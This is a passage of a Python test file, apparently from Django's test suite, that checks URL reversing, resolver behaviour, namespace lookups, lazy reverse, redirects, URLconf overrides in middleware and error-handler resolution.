@override_settings(ROOT_URLCONF="urlpatterns_reverse.no_urls")
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r"^$"), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see the 'urlpatterns' "
"variable with valid patterns in the file then the issue is "
"probably caused by a circular import.",
):
getattr(resolver, "url_patterns")
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse("name", args=["a"], kwargs={"b": "c"})
@override_script_prefix("/{{invalid}}/")
def test_prefix_braces(self):
self.assertEqual(
"/%7B%7Binvalid%7D%7D/includes/non_path_include/",
reverse("non_path_include"),
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix("/bogus)/"):
self.assertEqual(
"/bogus)/includes/non_path_include/", reverse("non_path_include")
)
with override_script_prefix("/(bogus)/"):
self.assertEqual(
"/(bogus)/includes/non_path_include/", reverse("non_path_include")
)
@override_script_prefix("/bump%20map/")
def test_prefix_format_char(self):
self.assertEqual(
"/bump%2520map/includes/non_path_include/", reverse("non_path_include")
)
@override_script_prefix("/%7Eme/")
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual("/%257Eme/places/1/", reverse("places", args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(
NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"
):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix("/script:name/")
def test_script_name_escaping(self):
self.assertEqual(
reverse("optional", args=["foo:bar"]), "/script:name/optional/foo:bar/"
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("nonexistent-view")
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("places")
def test_illegal_args_message(self):
msg = (
"Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) "
"tried:"
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("places", args=(1, 2))
def test_illegal_kwargs_message(self):
msg = (
"Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 "
"pattern(s) tried:"
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("places", kwargs={"arg1": 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver("urlpatterns_reverse.namespace_urls")
sub_resolver = resolver.namespace_dict["test-ns1"][1]
self.assertIn("<URLPattern list>", repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = "urlpatterns_reverse.named_urls"
proxy_url = reverse_lazy("named-url1", urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver("urlpatterns_reverse.named_urls")
test_urls = [
# (name, args, kwargs, expected)
("named-url1", (), {}, ""),
("named-url2", ("arg",), {}, "extra/arg/"),
("named-url2", (), {"extra": "arg"}, "extra/arg/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
URL pattern name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver("urlpatterns_reverse.named_urls_conflict")
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
("name-conflict", (), {}, "conflict/"),
# With an arg, the last URL in urlpatterns has precedence.
("name-conflict", ("arg",), {}, "conflict-last/arg/"),
# With a kwarg, other URL patterns can be reversed.
("name-conflict", (), {"first": "arg"}, "conflict-first/arg/"),
("name-conflict", (), {"middle": "arg"}, "conflict-middle/arg/"),
("name-conflict", (), {"last": "arg"}, "conflict-last/arg/"),
# The number and order of the arguments don't interfere with reversing.
("name-conflict", ("arg", "arg"), {}, "conflict/arg/arg/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ["", "a", "\\", "."]
for path_ in test_urls:
with self.subTest(path=path_):
with self.assertRaises(Resolver404):
resolve(path_)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = "urlpatterns_reverse.named_urls"
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{"type": URLPattern, "name": "named-url1"}],
[{"type": URLPattern, "name": "named-url2"}],
[{"type": URLPattern, "name": None}],
[{"type": URLResolver}, {"type": URLPattern, "name": "named-url3"}],
[{"type": URLResolver}, {"type": URLPattern, "name": "named-url4"}],
[{"type": URLResolver}, {"type": URLPattern, "name": None}],
[{"type": URLResolver}, {"type": URLResolver}],
]
with self.assertRaisesMessage(Resolver404, "tried") as cm:
resolve("/included/nonexistent-url", urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn("tried", e.args[0])
self.assertEqual(
len(e.args[0]["tried"]),
len(url_types_names),
"Wrong number of tried URLs returned. Expected %s, got %s."
% (len(url_types_names), len(e.args[0]["tried"])),
)
for tried, expected in zip(e.args[0]["tried"], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
self.assertIsInstance(
t, e["type"]
), "%s is not an instance of %s" % (t, e["type"])
if "name" in e:
if not e["name"]:
self.assertIsNone(
t.name, "Expected no URL name but found %s." % t.name
)
else:
self.assertEqual(
t.name,
e["name"],
'Wrong URL name. Expected "%s", got "%s".'
% (e["name"], t.name),
)
def test_namespaced_view_detail(self):
resolver = get_resolver("urlpatterns_reverse.nested_urls")
self.assertTrue(resolver._is_callback("urlpatterns_reverse.nested_urls.view1"))
self.assertTrue(resolver._is_callback("urlpatterns_reverse.nested_urls.view2"))
self.assertTrue(resolver._is_callback("urlpatterns_reverse.nested_urls.View3"))
self.assertFalse(resolver._is_callback("urlpatterns_reverse.nested_urls.blub"))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver("urlpatterns_reverse.method_view_urls")
self.assertTrue(
resolver._is_callback(
"urlpatterns_reverse.method_view_urls.ViewContainer.method_view"
)
)
self.assertTrue(
resolver._is_callback(
"urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view"
)
)
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r"^/"), "urlpatterns_reverse.urls")
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF="urlpatterns_reverse.reverse_lazy_urls")
class ReverseLazyTest(TestCase):
def test_redirect_with_lazy_reverse(self):
response = self.client.get("/redirect/")
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user(
"alfred", "alfred@example.com", password="testpw"
)
response = self.client.get("/login_required_view/")
self.assertRedirects(
response, "/login/?next=/login_required_view/", status_code=302
)
self.client.force_login(alfred)
response = self.client.get("/login_required_view/")
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
"Some URL: %s" % reverse_lazy("some-login-page"), "Some URL: /login/"
)
def test_build_absolute_uri(self):
factory = RequestFactory()
request = factory.get("/")
self.assertEqual(
request.build_absolute_uri(reverse_lazy("some-login-page")),
"http://testserver/login/",
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
super().setUp()
self.write_settings(
"settings.py",
extra=(
"from django.urls import reverse_lazy\n"
"LOGIN_URL = reverse_lazy('login')"
),
)
def test_lazy_in_settings(self):
out, err = self.run_manage(["check"])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, "/hi-there/")
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, "/hi-there/")
def test_redirect_to_view_name(self):
res = redirect("hardcoded2")
self.assertEqual(res.url, "/hardcoded/doc.pdf")
res = redirect("places", 1)
self.assertEqual(res.url, "/places/1/")
res = redirect("headlines", year="2008", month="02", day="17")
self.assertEqual(res.url, "/headlines/2008.02.17/")
with self.assertRaises(NoReverseMatch):
redirect("not-a-view")
def test_redirect_to_url(self):
res = redirect("/foo/")
self.assertEqual(res.url, "/foo/")
res = redirect("http://example.com/")
self.assertEqual(res.url, "http://example.com/")
# Assert that we can redirect using UTF-8 strings
res = redirect("/æøå/abc/")
self.assertEqual(res.url, "/%C3%A6%C3%B8%C3%A5/abc/")
# Assert that no imports are attempted when dealing with a relative path
# (previously, the below would resolve in a UnicodeEncodeError from __import__ )
res = redirect("/æøå.abc/")
self.assertEqual(res.url, "/%C3%A6%C3%B8%C3%A5.abc/")
res = redirect("os.path")
self.assertEqual(res.url, "os.path")
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), "/includes/nested_path/")
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, "/absolute_arg_view/")
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.namespace_urls")
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
("urlobject-view", [], {}),
("urlobject-view", [37, 42], {}),
("urlobject-view", [], {"arg1": 42, "arg2": 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
("inner-nothing", [], {}),
("inner-nothing", [37, 42], {}),
("inner-nothing", [], {"arg1": 42, "arg2": 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
"blahblah:urlobject-view",
"test-ns1:blahblah:urlobject-view",
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
("normal-view", [], {}, "/normal/"),
("normal-view", [37, 42], {}, "/normal/37/42/"),
("normal-view", [], {"arg1": 42, "arg2": 37}, "/normal/42/37/"),
("special-view", [], {}, "/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
("included_namespace_urls:inc-normal-view", [], {}, "/included/normal/"),
(
"included_namespace_urls:inc-normal-view",
[37, 42],
{},
"/included/normal/37/42/",
),
(
"included_namespace_urls:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/included/normal/42/37/",
),
("included_namespace_urls:inc-special-view", [], {}, "/included/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
("test-ns1:urlobject-view", [], {}, "/test1/inner/"),
("test-ns1:urlobject-view", [37, 42], {}, "/test1/inner/37/42/"),
(
"test-ns1:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/test1/inner/42/37/",
),
("test-ns1:urlobject-special-view", [], {}, "/test1/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
("new-ns1:urlobject-view", [], {}, "/newapp1/inner/"),
("new-ns1:urlobject-view", [37, 42], {}, "/newapp1/inner/37/42/"),
(
"new-ns1:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/newapp1/inner/42/37/",
),
("new-ns1:urlobject-special-view", [], {}, "/newapp1/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
("newapp:urlobject-view", [], {}, "/new-default/inner/"),
("newapp:urlobject-view", [37, 42], {}, "/new-default/inner/37/42/"),
(
"newapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/new-default/inner/42/37/",
),
("newapp:urlobject-special-view", [], {}, "/new-default/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
(
"included_namespace_urls:test-ns3:urlobject-view",
[],
{},
"/included/test3/inner/",
),
(
"included_namespace_urls:test-ns3:urlobject-view",
[37, 42],
{},
"/included/test3/inner/37/42/",
),
(
"included_namespace_urls:test-ns3:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/included/test3/inner/42/37/",
),
(
"included_namespace_urls:test-ns3:urlobject-special-view",
[],
{},
"/included/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
("inc-ns1:inc-normal-view", [], {}, "/ns-included1/normal/"),
("inc-ns1:inc-normal-view", [37, 42], {}, "/ns-included1/normal/37/42/"),
(
"inc-ns1:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/ns-included1/normal/42/37/",
),
("inc-ns1:inc-special-view", [], {}, "/ns-included1/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
("app-ns1:inc-normal-view", [], {}, "/app-included1/normal/"),
("app-ns1:inc-normal-view", [37, 42], {}, "/app-included1/normal/37/42/"),
(
"app-ns1:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/app-included1/normal/42/37/",
),
("app-ns1:inc-special-view", [], {}, "/app-included1/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
("inc-outer:inc-normal-view", [], {"outer": 42}, "/ns-outer/42/normal/"),
("inc-outer:inc-normal-view", [42], {}, "/ns-outer/42/normal/"),
(
"inc-outer:inc-normal-view",
[],
{"arg1": 37, "arg2": 4, "outer": 42},
"/ns-outer/42/normal/37/4/",
),
("inc-outer:inc-normal-view", [42, 37, 4], {}, "/ns-outer/42/normal/37/4/"),
("inc-outer:inc-special-view", [], {"outer": 42}, "/ns-outer/42/+%5C$*/"),
("inc-outer:inc-special-view", [42], {}, "/ns-outer/42/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
("inc-ns1:test-ns3:urlobject-view", [], {}, "/ns-included1/test3/inner/"),
(
"inc-ns1:test-ns3:urlobject-view",
[37, 42],
{},
"/ns-included1/test3/inner/37/42/",
),
(
"inc-ns1:test-ns3:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/ns-included1/test3/inner/42/37/",
),
(
"inc-ns1:test-ns3:urlobject-special-view",
[],
{},
"/ns-included1/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view",
[],
{},
"/ns-included1/ns-included4/ns-included1/test3/inner/",
),
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view",
[37, 42],
{},
"/ns-included1/ns-included4/ns-included1/test3/inner/37/42/",
),
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/ns-included1/ns-included4/ns-included1/test3/inner/42/37/",
),
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view",
[],
{},
"/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
("testapp:urlobject-view", [], {}, "/default/inner/"),
("testapp:urlobject-view", [37, 42], {}, "/default/inner/37/42/"),
(
"testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/default/inner/42/37/",
),
("testapp:urlobject-special-view", [], {}, "/default/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
("testapp:urlobject-view", [], {}, "test-ns3", "/default/inner/"),
(
"testapp:urlobject-view",
[37, 42],
{},
"test-ns3",
"/default/inner/37/42/",
),
(
"testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"test-ns3",
"/default/inner/42/37/",
),
(
"testapp:urlobject-special-view",
[],
{},
"test-ns3",
"/default/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
("nodefault:urlobject-view", [], {}, None, "/other2/inner/"),
("nodefault:urlobject-view", [37, 42], {}, None, "/other2/inner/37/42/"),
(
"nodefault:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
None,
"/other2/inner/42/37/",
),
("nodefault:urlobject-special-view", [], {}, None, "/other2/inner/+%5C$*/"),
("nodefault:urlobject-view", [], {}, "other-ns1", "/other1/inner/"),
(
"nodefault:urlobject-view",
[37, 42],
{},
"other-ns1",
"/other1/inner/37/42/",
),
(
"nodefault:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"other-ns1",
"/other1/inner/42/37/",
),
(
"nodefault:urlobject-special-view",
[],
{},
"other-ns1",
"/other1/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
def test_special_chars_namespace(self):
test_urls = [
(
"special:included_namespace_urls:inc-normal-view",
[],
{},
"/+%5C$*/included/normal/",
),
(
"special:included_namespace_urls:inc-normal-view",
[37, 42],
{},
"/+%5C$*/included/normal/37/42/",
),
(
"special:included_namespace_urls:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/+%5C$*/included/normal/42/37/",
),
(
"special:included_namespace_urls:inc-special-view",
[],
{},
"/+%5C$*/included/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
("inc-ns5:inner-nothing", [], {"outer": "70"}, "/inc70/"),
(
"inc-ns5:inner-extra",
[],
{"extra": "foobar", "outer": "78"},
"/inc78/extra/foobar/",
),
("inc-ns5:inner-nothing", ["70"], {}, "/inc70/"),
("inc-ns5:inner-extra", ["78", "foobar"], {}, "/inc78/extra/foobar/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
A nested current_app should be split in individual namespaces (#24904).
"""
test_urls = [
(
"inc-ns1:testapp:urlobject-view",
[],
{},
None,
"/ns-included1/test4/inner/",
),
(
"inc-ns1:testapp:urlobject-view",
[37, 42],
{},
None,
"/ns-included1/test4/inner/37/42/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
None,
"/ns-included1/test4/inner/42/37/",
),
(
"inc-ns1:testapp:urlobject-special-view",
[],
{},
None,
"/ns-included1/test4/inner/+%5C$*/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/",
),
(
"inc-ns1:testapp:urlobject-view",
[37, 42],
{},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/37/42/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/42/37/",
),
(
"inc-ns1:testapp:urlobject-special-view",
[],
{},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
(
"inc-ns1:testapp:urlobject-view",
[],
{},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/",
),
(
"inc-ns1:testapp:urlobject-view",
[37, 42],
{},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/37/42/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/42/37/",
),
(
"inc-ns1:testapp:urlobject-special-view",
[],
{},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get("/test/me/")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.content, b"outer:/test/me/,inner:/inner_urlconf/second_test/"
)
response = self.client.get("/inner_urlconf/second_test/")
self.assertEqual(response.status_code, 200)
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get("/test/me/")
self.assertEqual(response.status_code, 404)
response = self.client.get("/inner_urlconf/second_test/")
self.assertEqual(response.status_code, 404)
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b"outer:,inner:/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.NullChangeURLconfMiddleware" % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get("/test/me/")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.content, b"outer:/test/me/,inner:/inner_urlconf/second_test/"
)
response = self.client.get("/inner_urlconf/second_test/")
self.assertEqual(response.status_code, 200)
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseInnerInResponseMiddleware" % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b"/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseOuterInResponseMiddleware" % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
Test reversing an URL from the *default* URLconf from inside
a response middleware.
"""
msg = (
"Reverse for 'outer' not found. 'outer' is not a valid view "
"function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
self.client.get("/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseInnerInStreaming" % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 200)
self.assertEqual(b"".join(response), b"/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseOuterInStreaming" % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
Test reversing an URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get("/second_test/")
b"".join(self.client.get("/second_test/"))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(
MIDDLEWARE=["%s.ChangeURLconfMiddleware" % middleware.__name__]
):
self.client.get(reverse("inner"))
self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = "urlpatterns_reverse.urls_error_handlers"
urlconf_callables = "urlpatterns_reverse.urls_error_handlers_callables"
self.resolver = URLResolver(RegexPattern(r"^$"), urlconf)
self.callable_resolver = URLResolver(RegexPattern(r"^$"), urlconf_callables)
def test_named_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), empty_view)
def test_callable_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(
self.callable_resolver.resolve_error_handler(code), empty_view
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls_without_handlers")
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get("/test/")
self.assertEqual(response.status_code, 404)
msg = "I don't think I'm getting good value for this view"
with self.assertRaisesMessage(ValueError, msg):
self.client.get("/bad_view/")
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see the 'urlpatterns' variable with valid patterns "
"in the file then the issue is probably caused by a circular "
"import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get("/test/me/")
